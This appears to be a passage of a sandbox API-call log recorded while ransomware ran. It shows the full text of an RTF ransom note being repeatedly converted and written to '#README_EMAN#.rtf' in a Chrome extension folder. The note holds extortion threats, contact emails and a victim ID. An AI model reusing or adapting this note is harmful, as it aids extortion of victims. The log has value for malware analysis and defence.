m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.056] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.056] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.056] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.056] CloseHandle (hObject=0x294) returned 1 [0285.057] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\#readme_eman#.rtf")) returned 0xffffffff [0285.057] GetLastError () returned 0x2 [0285.057] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 